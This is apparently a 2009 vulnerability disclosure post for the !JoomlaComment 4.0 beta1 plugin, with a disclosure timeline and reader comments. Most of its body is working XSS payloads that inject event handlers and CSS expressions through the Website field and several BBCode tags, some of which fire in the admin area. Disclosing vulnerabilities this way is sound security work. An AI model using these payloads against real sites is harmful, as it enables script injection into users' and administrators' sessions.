Thursday, 17 September 2009 00:00
!JoomlaComment 4.0 beta1, a commenting plugin, suffers from multiple XSS vulnerabilities.
Website Input XSS
The 'Website' input field is checked for html markup, but fails to sanitize extra parameters.' onmouseover='alert(String.fromCharCode(88,83,83))
' style='color:expression(alert(String.fromCharCode(88,83,83)))
[img] BBCode Tag XSS
[img]http://pick.a.big/image.png' onmousemove='javascript:alert(String.fromCharCode(88,83,83))[/img]
[url] BBCode Tag XSS
[url=http://pick.a.big/image.png' onmousemove='javascript:alert(String.fromCharCode(88,83,83))]XSS[/url]
[size] BBCode Tag XSS
[size=large;color:expression(alert(String.fromCharCode(88,83,83)))]XSS[/size]
This XSS vulnerability executes in the administrator area as well.[color] BBCode Tag XSS
[color=red;font-size:expression(alert(String.fromCharCode(88,83,83)))]XSS[/color]
This XSS vulnerability executes in the administrator area as well.
Timeline
- Vulnerabilities Discovered: 31 July 2009
- Vendor Notified: 31 July 2009
- Vendor Response: ... 2009
- Update Available: ... 2009
- Disclosure: 17 September 2009
Last Updated on Thursday, 30 September 2010 17:36
Comments (3)
Add your comment
Latest Articles
Most Popular
The Joomla!® name is used under a limited license from Open Source Matters in the United States and other countries. Jeff Channell is not affiliated with or endorsed by Open Source Matters or the Joomla!® Project.
Cart
Your Cart is currently empty.
Keywords
Template Info
-
Name
Circles -
Creation Date
06/28/09 -
Author
Jeff Channell -
Author Email
me@jeffchannell.com -
Author URL
http://jeffchannell.com -
Version
0.0.2 -
Description
Circles
Thanks for posting this. I discovered it via the Vulnerable Extensions List. I noticed that this is for version 4.0 Beta version 1. I'm currently using Version 4.0 Beta Version 2. Any idea if the problem has been corrected in the current build?
Sorry I can't be more helpful than that!